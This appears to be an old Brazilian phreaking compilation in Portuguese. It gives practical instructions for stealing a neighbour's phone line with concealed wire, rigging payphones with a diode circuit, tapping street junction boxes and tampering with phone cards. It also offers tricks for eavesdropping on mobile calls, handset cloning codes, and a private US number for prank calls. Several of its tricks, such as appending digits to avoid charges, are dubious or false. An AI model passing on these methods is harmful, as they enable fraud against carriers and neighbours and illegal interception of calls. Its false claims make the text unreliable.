Sites de venda on-line:
     -> http://www.phoneart.com/
     -> http://www.battery-direct.com/
     -> http://www.abcell.com/
     -> http://www.digicel.com.br/
-> http://www.criterioncellular.com/

Sites sobre SMS, que mandam noticias ou algo parecido:

http://www.girando.com.br/
http://www.msgcelular.com.br/
http://www.internetnamao.com.br/
http://www.desplugado.com.br/
http://www.tiaxa.com.br/
http://www.eimail.com.br/
http://www.pageme.com.br/
http://www.napalm.com.br/
http://www.tip.com.br/
http://www.celulardagalera.com.br/
http://www.ondefor.com/
http://www.elefante.com.br/
http://www.mywap.com.br/

<<Voltar



clonagem do celular motorola


Para você clonar o celular da Motorola siga as instruções:
fnc 00 - 83786633 sto #11991# 08# - para sair tecle 01#
Para clonagem oficial da TELESP CELULAR: 55# e acesse as
funções ocultas...
Testar o Vibra CAL (STAR TAC): 56#
Para "FUDER" um celular: 33# (he he he...)
Para sair: 01#




Pegando linha do(a) vizinho(a)
Iniciando...

Como sempre primeiramente advertemos: você só deve fazer isso se
você pensar duas vezes e assumir eventuais problemas. Este texto
tem um caráter meramente educativo. Não nos responsabilizamos
pelos seus atos. Então vamos lá!

Introdução

Muito se discute sobre o preço de uma ligação telefônica, os preços
cobrados pelas PODRES companhias telefônicas do Brasil são
realmente um abuso, e isso nos leva e nos incentiva a "compartilhar" a
linha telefônica do vizinho. Isso é mais fácil do que você imagina, até
uma inocente criança esperta pode conseguir catar um fiozinho e
emendar o fio na linha alheia. Quando conseguido compartilhar a linha
telefônica alheia com sucesso, ensine isso para seus amigos, lembre-
se, se seu colega for babaca ele pode te "dedar" para as autoridades,
e daí você se ferra, caso você se fuder, esqueça que você soube esta
informação neste inocente e informativo arquivinho, composto por
milhares de bytes.

Preparativos

Primeiro você deve verificar as possibilidades de você conseguir
alcançar a nossa amiga linha-alheia, se você for premiado de ter a
linha-alheia perto da sua casa, e acessível para poder descascar os
fios tranquilamente, sorte sua, mas se não for mude de casa ou se
foda...

Vamos ao assunto!
Arrume de alguma maneira uns fiozinhos esmaltados finos. A razão de
utilizarmos fios finos é para que a "vítima" compartilhada não descubra
o fiozinho, mas se você for bobo, pode usar fios normais.
Se você não conseguir obter o tal do fio esmaltado tenho uma dica:
desmonte um tranformadorzinho com cuidado, e corte uns +/- 3 metros
de fios (não pode ser tão fininho senão pode se romper).
Obtido o tal do fiozinho esmaltado, você deve dividí-lo em dois, pois,
como qualquer desgraçado sabe, a linha telefônica comum é
composta por dois fios pretos grossos paralelos.
Dividido o fio esmaltado em dois, naturalmente obtemos dois belos
pedaços de fios esmaltados, se você tiver alguma esperiência na área
de elétrica ou eletrônica vc deve saber que somente objetos metálicos
conduzem bem a eletricidade, mas metais envernizados ou pintados
não conduzem eletricidade, e se você raciocinar, deve ter percebido
que os fios esmaltados não conduzem, pois nele existe uma "capa" de
tinta (verniz). A razão desses fios serem envernizados, é que quando
encostamos ou enrolamos fios virtualmente encapados
(envernizados), não há perigos da corrente se curto-circuitar.
Com os dois pedaços de fio esmaltados na mão, você deve raspar as
pontas do fio numa lima ou lixa, para remover a capa de verniz que
reveste o fio, lembre-se faça isso nas quatro pontas (2 x 2 = 4!), com
cuidado.
Agora arrume um fio normal paralelo (=====), do tamanho suficiente
para alcançar seu quarto ou local desejado para você poder usufruir
da bela linha. Emende duas das pontas do fio normal nas duas pontas
do fiozinho esmaltado com cuidado. Veja a figura abaixo:



Isole cuidadosamente. Certifique-se que a emenda funcionou, o fio
deve conduzir um por um (são dois), mas não deve conduzir um
paralelo ao outro, o que é caracterizado como um curto.
Todo OKEY, então vamos lá, arrume algum meio de ter acesso à linha
do vizinho ou mesmo ao poste, pegue uma escada/suba no muro etc...
Cuidado para o vizinho não te avistar, prefira quando seu vizinho não
esteja em casa. Descasque cuidadosamente o fio grosso preto (não
confunda com o fio da energia elétrica! - não se preocupe, pois é muito
difícil você levar algum choque perceptível na linha, a não ser que
você esteja com os pés molhados e em contato com o chão, mas
mesmo assim o choque é fraco, somente os otários dizem que a linha
de telefone dá choque...), cuide para não deixar vestígios.
Descascados os fios, deve-se emendar o fio esmaltado na linha,
cuidado para não deixar encostado um fio no outro, senão a linha
ficará "muda"...
Emendado o fio na linha, camufle bem o fio para a vítima não ver.
Para ver se realmente funcionou, ligue um LED nos fios de "saída" que
você elaborou, se não acender inverta, e se mesmo assim não
acender, verifique cuidadosamente a instalação, e se o LED insistir em
não acender, considere duas possibilidades:


LED queimado
A linha da vítima está "cortada" (azar seu! quem manda tentar usar
linha alheia!)
Se o LED acendeu, comemore, você conseguiu, parabéns! (e
agradeça a mim) Agora você se vira. Ligue um computador na linha e
use com sua conta de Internet pirata! - resultado, acessar internet à
vontade sem pagar um centavo !(a não ser pela energia que seu
computador consome. Se você quiser compartilhar a rede elétrica do
seu vizinho...).


Cuidados pós-linha

Agora, é so você e a linha piratona, você faz o que quiser, se for
babaca até faz ligações internacionais (daí com certeza o vizinho vai
perceber que tem algo errado... e você se fode!), recomendo usar
somente à noite, quando o vizinho provavelmente não vai tirar o fone
do gancho (e ouvir um belo chiado do modem - se o vizinho for bobo,
ele nem liga), só efetuar ligações locais para seu provedor (recomendo
usar a senha de alguém, ou criar uma conta falsa). Se a linha da
vítima for CPA, melhor ainda!

EM BREVE PUBLICAREMOS UM PROJETO ELETRÔNICO NESTA
HOME-PAGE: O projeto te "corta" quando o vizinho tenta usar a linha,
e daí você pode acessar a linha o dia inteiro sem se preocupar, pois o
projeto te traz segurança; fique ligado na EXPLORER HaCkEr'S PaGe
. Em Breve.

Conclusão
Concluímos que nós hacker's e cracker's devemos nos evoluir e
buscar de um certo modo, justiça. Lutamos por um mundo melhor.
Morte ao pensamento neo-liberal.



burlando celulares


Primeiro, pegue o número que você vai discar. Ex.: 123-4567 Então
devemos pegar o ultimo numero do telefone a ser discado, no caso o
7... subtraímos ele de 10, o que vai resultar o numero 3. Somente
vamos acrescentar o numero 3 ao final do numero discado. O
resultado vai ficar: Numero ligado sem pagar: 123-4567-3



ouvindo escutas de celulares


Primeiro tire a bateria do seu celular, depois de abrir vão existir umas
partes de metal lá embaixo do celular isso mesmo 3 risquinhos de
metal , pegue um pedaço de papel alumínio e bote lá ,dai bote a
bateria e ligue o celular, vai dar um negocio, digite #1008# e é só ouvir
as conversas.



ligando a cobrar mais barato


Para ligar a cobrar mais barato, você tem que adicionar um número
que a soma dele com o último seja igual a 10. Ex: A soma desses
números tem que dar 10. Como fazer: Ex.: 9 011 5584-0352 8

manual definitivo de violação a telefones públicos e privados

Índice

0 - Aviso
1.0 - Introdução
1.1 - Pobreza de informações e pessoas mal informadas
1.3 - Conceitos básicos a respeito de telefonia
2.0 - Telefones privados
2.1 - Introdução
2.2 - Efetuando ligações de aparelhos sem teclas
3.0 - Telefones públicos
3.1 - Introdução
3.2 - Efetuando ligações gratuitamente utilizando um diodo
3.3 - Efetuando ligações gratuitamente utilizando um aparelho comum
3.4 - Conectando notebooks a telefones públicos
3.5 - Observação
4.0 - Caixas de verificação
4.1 - Introdução
4.2 - Efetuando ligações gratuitas de caixas de verificação
5.0 - Pequena FAQ sobre telefonia
5.1 - É possível tomar um choque mexendo em fios telefônicos?
5.2 - Como faço para fazer chamadas grátis de minha residência?
5.3 - O que é o BINA?
5.4 - Existe alguma maneira de se bloquear o BINA?
5.5 - As famosas "boxes" funcionam aqui no Brasil?
6.0 - Conclusão

Aviso

Antes, aquele chavão de sempre: todos os procedimentos descritos
nesse documento são ilegais e podem levar o infrator a cumprir penas
de prisão e/ou pagamento de multas. Vale lembrar também que eu
sou contra qualquer tipo de vandalismo, e que todo o processo aqui
descrito não causa nenhum tipo de dano aos aparelhos telefônicos.
Mesmo a longo prazo. O cidadão idiota que copiar este documento,
totalmente ou em parte, sem avisar o autor, não passará de um lamer
de primeira que não faz porra nenhuma e tenta enganar os outros mas
consegue enganar a si mesmo. Esse texto poderá ser mencionado em
outros documentos, desde que conste nesses de onde ele foi retirado
e quem o escreveu (no caso, eu :-))

Seção 1 - Introdução

1.1 - Pobreza de informações e pessoas mal informadas
Ao me deparar com alguns textos do gênero, sentia-me decepcionado
ao perceber que eram incompletos e fracos, quando o assunto em
questão era a telefonia. É triste também perceber que pessoas mal
informadas e sem conhecimento técnico (embora tenham boa
vontade), assinam estes textos. Faço aqui um tutorial com material
bastante útil, que explica muitas coisas que podem ser feitas com a
intenção de buscar um pouco de liberdade para se utilizar os sistemas
telefônicos. Este texto também é destinado àqueles que se rasgam de
ler textos americanos de phreaking e boxing. Não importa o que fulano
ouviu dizer que dava o sistema telefônico nacional é complemente
diferente do usado nos EUA e não permite o "boxing". Ver maiores
detalhes na seção 5.

1.3 - Conceitos básicos a respeito de telefonia

Ao contrário do que muita gente pensa, os fios da linha telefônica
possuem uma tensão contínua equivalente a -48 volts. Esta tensão se
altera para um valor alternado de 96 volts quando o telefone toca.
Portanto, ao lidar com os fios do telefone, tenha o cuidado de não
encostar no orelhão, na parede, ou em qualquer coisa que possa
"aterrá-lo". Este cuidado deve ser redobrado se o telefone for
comunitário ou residencial. Levemos também em consideração que se
o aparelho possuí uma tensão contínua, significa que ele tem também
uma polarização correta (fio positivo e fio negativo). Na instalação do
aparelho esta polarização não faz diferença, mas quando o assunto é
violação, ela deve ser observada. Vamos lembrar também que existem
dois tipos de linhas telefônicas:

A) Decádicas (ou Pulse) - são as linhas dos prefixos mais antigos do
sistema telefônico. A identificação de chamadas se dá através de uma
série de sinais (pulsos), que são interpretados pela central telefônica.

B) Multifrequenciais (ou Tone) - são as linhas dos prefixos mais novos
onde trabalham o serviço de CPA (Central telefônica com controle por
Programa Armazenado). A identificação de chamadas se dá através
da decodificação de tons freqüênciais em números.

Seção 2 - Telefones privados
2.1 - Introdução

Nesta seção, explicarei o processo (bem simples) de se efetuar
ligações a partir de telefones sem teclas ou com cadeado, muito
comuns em empresas e ambientes de trabalho.

2.2 - Efetuando ligações de aparelhos sem teclas

Antes de começarmos, precisamos definir o que significa "duração de
um pulso". Um pulso é simplesmente uma interrupção no fluxo de
corrente que circula na linha telefônica, e a sua duração é entendida
como o espaço de tempo decorrido do início ao fim desta interrupção.
Os pulsos enviados pelo aparelho telefônico quando você aperta o
botão de algum número, são iguais ao sinal emitido quando você
coloca o telefone no gancho. A diferenciação é feita pela central
telefônica, usando como referência a duração do pulso. Se ele for um
pouco maior do que 0.5 segundos (aumentar um pouco esse valor
para as linhas mais antigas), a central considera que é um pedido de
linha. Se a duração do pulso for menor do que esse valor, a central irá
considerar que um número a ser discado está sendo enviado. Para
formar os números de 0 a 9, são enviado uma série de pequenos
pulsos em seqüência referentes ao número, ou seja, 2 pulsos para o
número 2, 3 para o número 3 e assim por diante. Para o número 0 são
enviados dez pulsos. Para simular esses pulsos sem a necessidade
de teclas, basta usar o botão onde se "pega" a linha, aquele onde
você coloca o telefone em cima quando quer terminar uma ligação.
Aperte e solte este botão rapidamente de acordo com o número que
você quer discar, espere um pouco e aperte outra série de vezes de
acordo com o outro número. Lembre-se que para o número 0 deve-se
apertar o botão dez vezes. Faça isso com todos os números e, ao
final, você escutará o tom de chamada. Seção 3.0 - Telefones públicos

3.1 - Introdução

Nesta seção explicaremos alguns métodos de efetuar ligações com
telefones públicos sem a necessidade de se gastar fichas.
Mostraremos também como ligar notebooks a telefones públicos (se é
que existe um hacker que não saiba...).

3.2 - Efetuando ligações gratuitamente utilizando um diodo
O diodo é um componente eletrônico que possui diversas utilizações.
Podemos resumir seu funcionamento basicamente na seguinte
síntese: Um diodo (ou junção PN), permite que a corrente circule em
apenas uma direção dentro de um circuito. Ao se utilizá-lo para o fim
aqui desejado, vamos precisar de um diodo IN4002, IN4004 ou
IN4007. Estes podem ser encontrados facilmente em qualquer casa de
componentes eletrônicos. Vamos precisar também de um resistor com
valor nominal de 22K e potência de 1W. Basta que você ligue o diodo
em paralelo com o resistor (conforme tenta mostrar a ilustração
abaixo) e, em seguida, descasque os fios do telefone e ligue cada uma
das pontas obtidas com o diodo e o resistor neles.




Lembre-se: você vai apenas descascar os fios do orelhão!!! Se você
cortá-los, ele vai ficar sem linha. Para executar esta tarefa, eu
aconselho que você descasque os fios dos orelhões que você utiliza
com mais freqüência pois, devido ao fato dos fios do telefone público
serem muito grossos, não é um trabalho que se possa fazer tranqüila
e rapidamente sem ser notado. Você deverá observar também a
polarização correta a ser utilizada. Você perceberá isso facilmente
pois, quando você ligar o diodo de maneira errada, o orelhão vai ficar
sem linha. Uma dica pessoal: os telefones de cabine e os de cartão
são mais fáceis de serem violados. Alguns orelhões comuns tem uma
proteção blindada que impedem o acesso ao cabo telefônico. Embora
mesmo assim seja possível puxar o fio com um gancho, que você
enfiará do lado esquerdo do aparelho telefônico, entre o telefone e
uma grade preta de sustentação que fica atrás dele, eu aconselho que
você evite esses tipos. Vamos voltar um pouco para a parte técnica da
coisa. O diodo que estamos utilizando vai funcionar da seguinte
maneira: Quando uma ligação é completada de um telefone público, a
central inverte a polarização do telefone de -48 para 48 volts. Quando
o aparelho telefônico percebe isso, ele pede uma fixa. É aí que entra
em funcionamento o nosso querido diodo. Ele permite que a tensão
caia até 0 volts, mas não permite que ela se torne positiva. Dessa
forma o orelhão não vai pedir a ficha. Nesse caso o resistor está
funcionando apenas como um dissipador de potência, para que você
não dê o azar de queimar o diodo (não que ele seja caro, é que em
algumas localidades ele pode ser uma peça rara que custa R$0,10) e
ficar sem telefonar. Mesmo se você não achar nenhuma loja que
venda, pegue uma placa antiga de alguma coisa que tenha queimado.
Elas sempre tem diodos. Você deve procurar uma peça pequenina
que tem dois terminais, é preta e normalmente estará escrito IN
qualquer coisa.
3.3 - Efetuando ligações gratuitamente utilizando um aparelho comum

Primeiro, você deve tomar os processos citados anteriormente para
descascar os fios do telefone. Em seguida você deve conseguir um
aparelho telefônico comum e ligar cada uma das pontas dos fios dele
nos fios do orelhão. Para facilitar a sua vida, eu aconselho que o seu
telefone seja o menor possível e que você prenda um jacaré (pequeno
gancho achado em qualquer loja de componentes eletrônicos) em
cada uma das pontas do seu telefone, para facilitar a ligação no
orelhão. Aí é só efetuar a ligação normalmente.

3.4 - Conectando notebooks a telefones públicos

O processo para se conectar notebooks a orelhões, é igual ao de se
conectar telefones comuns. Resumirei nesse item, algumas
considerações a respeito da fiação do notebook, que segue os
padrões da FCC Americana e é um pouco diferente da nossa. O
conector do fio do notebook, que é do tipo jack, tem quatro fios dentro
dele. Arranque o conector de plástico transparente que fica na ponta
do fio, pegue os dois fios centrais e separe-os dos fios das
extremidades. Estes dois fios centrais, são os que serão utilizados
para fazer a ligação no orelhão. Eu aconselho que você coloque
jacarés neles também. Basta conectar-se a BBS da mesma forma que
você se conecta em casa. Caso você queira testar se está tudo OK,
abra um programa de terminal qualquer e digite o comando ATA, se
fizer um barulhinho parecido com o tom de linha é que está tudo OK.

3.5 - Observação

As chamadas telefônicas se dividem em três categorias: locais, DDD
regionais e interurbanas (ou nacionais). As chamadas locais são
aquelas efetuadas dentro de sua cidade, as DDD regionais são as
ligações feitas dentro do complexo urbano onde você mora, no caso
de São Paulo, as chamadas DDD regionais são aquelas feitas para as
cidades que fazem parte da Grande São Paulo: Jundiaí, Santo André,
São Bernardo, etc. As chamadas interurbanas são aquelas feitas para
fora do complexo urbano onde você está localizado. Usando São
Paulo como exemplo, podemos citar o interior do estado de São Paulo
e cidades localizadas em outros estados. Os telefones comuns
efetuam chamadas locais e DDD regionais, e os telefones DDD
efetuam chamadas interurbanas, ou seja, para qualquer lugar do
Brasil.

Seção 4 - Caixas de verificação

4.1 - Introdução

As caixas de verificação (ou armários na linguagem "técnica" da
TELESP) são caixas de ferro, que geralmente ficam localizadas em
vias públicas, e são utilizadas para se fazer a checagem das linhas do
sistema e identificar problemas antes de se enfiar no subsolo para
tentar resolvê-los. Tais caixas costumam ser da cor cinza e tem cerca
de 1,5 m de altura, com um código em preto escrito na parte superior.
Elas possuem um grande número de fios telefônicos, todos eles
divididos em pares. Tais caixas podem ser facilmente abertas (se é
que a que você achar já não estiver arrombada), pois geralmente
possuem uma tranca padrão em forma de triângulo que qualquer
chaveiro conhecido pode fazer. Lembre-se que você é um hacker, não
um vândalo. Não vá arrombar a porra da caixa. Isto é coisa pra quem
não tem cérebro. Mesmo se ela estiver trancada com um cadeado. Se
não puder abrir um cadeado ou procurar informação de um método
para abri-lo, procure outra caixa. Ou então esqueça que você leu esta
seção.

4.2 - Efetuando ligações gratuitas de caixas de verificação

Para se efetuar uma ligação de dentro destas caixas, basta que você
pegue um dos diversos pares de fios que se encontram lá dentro e
ligue eles ao seu pequeno telefone comum portátil ou a um notebook.
Não esqueça de por os fios que você tirou de volta no lugar para que,
nem o pessoal da manutenção e nem o dono da linha, percebam.
Como essas caixas de verificação costumam se situar em vias bem
movimentadas, a prática desse tipo de ligação é desaconselhada.
Mas, como toda a regra tem sua exceção, fica aqui mais uma
informação para você. Vale lembrar que de caixas de verificação,
pode-se efetuar telefonemas para qualquer lugar, inclusive chamadas
internacionais.

Seção 5 - Pequena FAQ sobre telefonia

5.1 - É possível tomar um choque mexendo em fios telefônicos?

Como descrito no item 1.3, os fios telefônicos possuem uma tensão
suficiente para dar choque relativamente forte em uma pessoa. Este
valor de tensão pode atingir um patamar em que ele pode dar um
verdadeiro coice na pessoa, no momento em que a linha envia o sinal
para o telefone tocar. Isto depende muito da situação e da pessoa. Se
você estiver com a mão no orelhão e mexer nos fios, você
provavelmente vai tomar um choque legal. Se você tiver acabado de
comer algo salgado, provavelmente este choque será ainda mais forte,
pois o sal aumenta a condutividade do seu corpo.

5.2 - Como faço para fazer chamadas grátis de minha residência?

Quando você efetua uma chamada, a central telefônica identifica de
onde você está discando, identifica qual o tipo de telefone que você
está usando (público ou residencial), e então ela arquiva pra onde está
senda feita a ligação e toma as providências necessárias com relação
a cobrança. Essa identificação é feita na fonte e não por um sinal
enviado pelo seu telefone. Desse modo, é praticamente impossível pra
você que está na sua residência, tentar driblar essa tarifação. Imagine
que sua linha telefônica não passa de um ramal de PABX.

5.3 - O que é o BINA?

O BINA, é um sistema de identificação de chamadas desenvolvido
com tecnologia nacional, que permite a quem está recebendo a
chamada, visualizar o número do telefone de quem está telefonando
para ele. O esquema teve que ser desenvolvido aqui no Brasil, pois o
sistema telefônico é tão arcaico, que não existiam pacotes prontos
para se adquirir. É como você tentar comprar um Kit Multimídia para
um TK-85 ou um MSX. Tal sistema só funciona em linhas Decádicas,
portanto, se você quiser passar um trote para alguém, procure se
certificar qual o tipo de linha que ela possui. Para isso, basta você dar
uma olhada no prefixo e ligar para a sua companhia telefônica local
perguntando se ele suporta CPA. Se eles falarem que sim, então pode
ficar tranqüilo e efetuar a ligação que você não corre o risco de ser
descoberto. Mas tome cuidado com o que você vai fazer pois, sob
ordem judicial, as companhias locais podem fornecer um rastreamento
de chamadas e assim descobrir de onde você telefonou.

5.4 - Existe alguma maneira de se bloquear o BINA?

Da mesma maneira que a tarifação, o BINA não pode ser driblado do
telefone que você está efetuando a chamada. Quem fornece o número
que vai aparecer no aparelho do receptor, é enviado pela central
telefônica e não pelo seu telefone. Vale que acrescentar que o sistema
não funciona perfeitamente bem e que às vezes não consegue
identificar determinada chamada. Ele também não identifica chamadas
de telefones públicos.

5.5 - As famosas "boxes" funcionam aqui no Brasil?

Como se pode notar nesta seção, o sistema telefônica nacional,
trabalha de maneira centralizada ao contrário do americano que
trabalha de forma distribuída. E não é por acaso, pois, além de
possuírem um número bem maior de linhas telefônicas, os serviços lá
são privatizados e diversas companhias oferecem linhas telefônicas. A
tarifação se dá por diversas identificações enviadas pelos telefones e
diversas centrais distribuídas pelo país. O que os "boxes" fazem, é
driblar esses sinais enviando outros de diversas freqüências
diferentes. Por exemplo, você faz uma chamada internacional mas usa
uma "box" para enviar um sinal para a central de como esta chamada
fosse uma chamada local. Já de telefones públicos (quem já foi pra lá
sabe disso), depois que você efetua uma chamada, aparece
novamente um tom de linha que fica aguardando o sinal do orelhão
que diz que você pagou determinada taxa para o determinado serviço.
Neste caso os "boxes" enviam os sinais no lugar do orelhão e a
chamada é completada. Esses tipos são conhecidos como Red Boxes,
mas não funcionam em todos os telefones públicos. Se bem que,
ultimamente, as centrais telefônicas estão sendo substituídas por
modelos mais novos. Isto ocorre principalmente em São Paulo. Mas
caso elas permitam o "boxing", isto será um assunto para um próxima
versão desta FAQ.
Seção 6 - Conclusão

O telefone (celular, público, comum) revolucionou a maneira como nós
nos comunicamos. Mas são cobrados preços injustos pelo serviços, e
nós hacker's, devemos sempre nos aperfeiçoarmos para combater a
esse e outros tipos de "injustiça".

Ps.: Não nos responsabilizamos por qualquer coisa que venha a
acontecer por virtude deste texto informativo.




TUDO SOBRE A TELEFONIA:

Escutas por Celulares:


Primeiro tire a bateria do seu celular, depois de abrir vão existir umas
partes de metal lá embaixo do celular isso mesmo 3 risquinhos de
metal, pegue um pedaço de papel alumínio e bote lá ,dai bote a
bateria e ligue o celular, vai dar um negocio, digite #1008# e é só ouvir
as conversas.
LIGANDO DE UM ORELHÃO COM CARTÃO SEMPAGAR:

<BR< H1 < conhecelas: vai vc agora 4 são uso eu que técnicas As>

Enganando o telefone publico:


Bote o cartão , assim que a pessoa falar ALOW! segure o numero 9 e
retire o cartão, fique segurando o numero 9 até acabar de falar!



Truque do Grafite


O grafite é um material super condutor que conduz energia, e o cartão
funciona assim , ele tem uns 50 fuziveiszinhos, cada ligação gasta ele
queima um fuzivel, então o nosso amigo grafite que é condutor de
eletricidade, não deixa queimar os fuziveis então faça o seguinte atras
do cartão,(na parte cinza) rabisque-a com força e ,bote no telefone
publico e pronto ,mas lembre-se rabisque com força.



Truque do esmalte de unha incolor


O esmalte impede que esses fuziveis queimem, faça também esse
com oscartões de vídeo game (divertilandia)! Passe esmalte na parte
de traz docartão ,e no de vídeo game passe na parte da fita
magnética.



Truque do papel Alumínio


Pegue o cartão telefônico ZERADO dai bote ele de molho na água
cândida, depois de 3 ou 4 dias a tinta do cartão vai sair , depois pegue
papel alumínio e cubra as partes metálicas com o papel alumi , dai as
ligações virarão infinitas.


MAIS UM POUCO SOBRE TELEFONIA:

Escutando Celulares Via TV

Nos avisamos que fazer escuta celular é ilegal de acordo com a
ECPA, e estas informações são exclusivamente para uso e propósito
educacional não nos responsabilizamos pelo mal uso das informações
aqui contidas. TV VHF canais 70 - 83 pegue a melhor distribuição do
melhor tronco usado pelos celulares. Este é o que distribui nesse
fluxo. Sintonize esses canais ajustando-os a sua atual freqüência e
você estar preparado para fazer a escuta. Cada canal da TV obrigara
5Mhz com ótimo controle de sintonia. Se mesmo assim você não tiver
uma freqüência exata você precisará ler sobre freqüência e você terá
uma boa idéia de como obter uma exata. Se a sensibilidade não
estiver boa mesmo você estando na cidade, ou perto de uma
freqüência exata você pegara alguma coisa. Você poderá também
pegar transmissões de negócios no tronco móvel se o mesmo estiver
fechado, as transmissões não serão ilegais a menos que a conversa
esteja codificada então você poderá usar a velha TV para achar outro
local de negócios que use freqüências entre 800Mhz ou mais. Ligando
a cobrar mais barato Para ligar a cobrar mais barato, você tem que
adicionar um número que a soma dele com o último seja igual a 10.
Ex: A soma desses números tem que dar 10. Ex.: 9 011 1234-5678 2

Ligando a cobrar mais barato

Para ligar a cobrar mais barato, você tem que adicionar um número
que a soma dele com o último seja igual a 10. Ex: A soma desses
números tem que dar 10. Ex.: 9 011 1234-5678 2

Ligacoes Internacionais sem pagar

Para fazer uma ligação internacional, todos sabem que é muito fácil
ligar, mas pagar que é o problema. Durante esses anos muitos vêm
acessando BBS estrangeiras usando boxes para não pagar a ligação.
Com o que vamos ensinar agora, você vai poder ligarpara qualquer
lugar do mundo pagando um impulso normal sem usar nenhum
programa além do seu dial. O sistema é o seguinte: O número da linha
para onde você vai ligar é 316-433-9418, nos EUA. Como você está
no Brasil e vai ligar para os EUA você deve discar então 01 316-433-
9418 (Vai pagar uma nota se fizer assim !). O que você deve fazer é
usar um código de área que vai confundir os aparelhos da
EMBRATEL, e esse código é 0008. Vamos detalhar tudo: Para
enganar, você deve discar 0008 01 316-433-9418. 0, Ao discar o
primeiro 0, a EMBRATEL vai pensar que é um procedimento normal e
não vai dar nenhuma mensagem. 0, Ao discar o segundo zero a
EMBRATEL vai tentar localizar um país que tenha como código de
área 00. Não vai encontrar nenhum, mas como você vai ser rápido e
discar o terceiro zero antes da mensagem poder ser passada para
você. Aí você vai pensar... "Mesmo depois que eu já tiver discado o
terceiro número ela vai me dar a mensagem do segundo zero." Não é
verdade, pois os computadores estarão ocupados tentando localizar o
terceiro zero e não terão mais tempo de mandar a mensagem. 0, Ao
discar o terceiro zero os computadores da EMBRATEL já estarão
totalmente doidos com os zeros que você estará discando. Lembre-se
que você tem que ser rápido ao discar, pois se você demorar, as
mensagens que ainda não apareceram, provavelmente vão aparecer.
8, Ao discar o oito você estará mostrando aos computadores da
Embratel que estarão perdidos que você está querendo fazer uma
ligação internacional. 0, Mais um zero para deixar os computadores
realmente perdidos. 1, Código de área dos Estados Unidos. Pode ser
trocado por qualquer outro código de qualquer outro país. 316-433-
9418, Número da casa de um coitado aí qualquer. Se quiserem se
divertir passem uns trotes para ele.... Em inglês claro


NOKIA SECRETS

Consta neste documento alguns códigos para celulares Nokia da série
51xx, 61xx e que também funcionam em alguns outros modelos....

_________________

*3001#12345#

_________________
O principal. Contém a programação do celular, como NAN, ESN,
número de emergencia, senha...etc.

Uma breve descrição sobre os principais:

• NAM1, NAM2, NAM3...

É a programação para habilitar uma linha no celular.

- Home System ID > É o código da operadora

- Home SOC > Geralmente 0 ou 1

- Own Number > O número de sua linha

- Alpha tag > Seu nome ou nome da operadora (isso aparecerá na tela
principal)

Alguns textos de "clonagem" de celulares fala para você apenas
alterar a programação da NAM. Isso é ilusão.



• Security

Senha do celular.



• Emergency

Número de emergência (geralmente 190 ou 193). Para chamar o
número de emergência, mantenha pressionada a tecla 9. (Esse
serviço deve ser ativado nas configurações do celular)



• SW Version

Mostra a versão do software do celular;

Data de fabricação;
Módulo usado.



• Serial No.

ESN (Eletronic Serial Number). Esse é o número de série do celular.



• Field Test

Habilita um novo menu na celular. (Não vou entrar em detalhes sobre
esse menu. Talvez posteriormente. Caso esteja interessado, procure
na internet)

______________

*#92772689#

_______________

Não é muito importante, a não ser que você tenha um cabo
WARRANTY.

Tem:

"Serial No." Já explicado anteriormente;

"Life timer" que é o tempo total de uso;

"Repaired" provavelmente a data que o celular foi para garantia caso
isso tenha acontecido; "Transfer Data" que é usado com o cabo
WARRANTY. Ele transfere todos os dados de um celular para outro do
mesmo modelo.

______________

*#9999#

______________
Uma forma rápida de acessar a versão do software do seu celular,
data de fabricação e módulo.

_____________

*#639#

_____________

Programação rápida da NAM 1.

Também pode ser usado *#6391# para programação rápida da NAM1
e *#6392# para programação rápida da NAM2 (e assim
sucessivamente).

____________

*#7370

____________

Deixa o celular como veio de fábrica, ou seja, apaga toda agenda,
ringtones pessoais, pontuação dos jogos, últimos números discados,
recebidos...etc. Bom para quem comprou um celular usado ou vai
vender um.

________________________

# por uns 5 segundos

________________________

Segure a tecla # por uns 5 segundos e aparecerá o tempo total de uso
do celular

 violados, incluindo várias empresas públicas no Brasil. Na Internet
eles são conhecidos como HACKERS

           PHREACKER - hacker especialista em telefonia
Ligando de um Telefone Público gastando 1 Unidade só

É possível ligar de telefones públicos gastando uma única unidade.
Vamos te ensinar como fazer isso, depois é só curtir um bom bate-
papo com a sua namorada, falando quanto tempo você quiser. Siga as
instruções abaixo:

Coloque o cartão telefônico e disque normalmente para alguém.

Após a pessoa atender do outro lado, pressione e segure o 0 (zero).

Retire o cartão e não solte o 0.

Fale normalmente, mas sempre pressionando o 0.

Ao terminar, pare de segurar o zero e desligue o telefone.

Se os seus pais ficam reclamando que a conta telefônica da sua casa
está alta porque você fica pendurado no telefone, utilize-se deste
recurso para cessar as reclamações.

Fazendo Escuta Celular via TV

Estas informação provém de Case

Um de nossos inscritos enviou-nos um pequeno bit de informações
consideráveis que ensina como fazer escuta celular via TV(pode se
necessário usar o manual da TV).

TV VHF canais 70 - 83 pegue a melhor distribuiçao do melhor tronco
usado pelos celulares. Este é o que distribui nesse fluxo. Sintonize
esses canais ajustando-os a sua atual freqüência e você estar
preparado para fazer a escuta. Cada canal da TV obrigara 5Mhz com
ótimo controle de sintonia. Se mesmo assim você não tiver uma
freqüência exata você precisará ler sobre freqüência e você terá uma
boa idéia de como obter uma exata.

Se a sensividade não estiver boa mesmo você estando na cidade, ou
perto de uma freqüência exata você pegara alguma coisa. Você
poderá também pegar transmissões de negócios no tronco móvel se o
mesmo estiver fechado, as transmissões não serão ilegais a menos
que a conversa esteja codificada então você poderá usar a velha TV
para achar outro local de negócios que use freqüências entre 800Mhz
ou mais.

FUNCIONAMENTO DAS BOXES

Esse é um pequeno resumo tendo em vista esclarecer para que serve
cada box de acordo com a sua cor.

DESCRIÇÃO :

Acrylic : Rouba serviços de chamadas a três, chamada a espera e
redirecionamento de chamada

em sistemas telefônicos de quatro cabos.

Aero : Permite realizar chamadas nacionais e internacionais.

Aqua:

Beige: Elaboração de um microfone como os utilizados por
funcionários das teles.

Black

Blast : Amplificador de microfone do telefone.

Blotto:

Blue : Gera um tom de 2600 Hz. que controla o sistema da companhia
telefônica.

Brown: Cria um sistema de party-fone a partir das linhas existentes.

Bud: Intervém no telefone de outra linha.

Busy: Elimina o tom de marcação de uma linha para evitar que receba
ou emita chamadas.

Chartreuse : Para ampliar o sistema elétrico do telefone para outro
propósito.
Cheese: Faz com que o telefone se comporte como uma cabine.

Chrome: Manipula sinais de tráfego através de um sistema remoto.

Clear: Permite realizar chamadas grátis.

Color : Gravador de conversações telefônicas.

Copper: Provoca interferências de linhas cruzadas.

Crimson: Atua como um botão de bloqueio no telefone.

Dark : Redireciona chamadas da entrada ou saída a outro telefone.

Dayglo

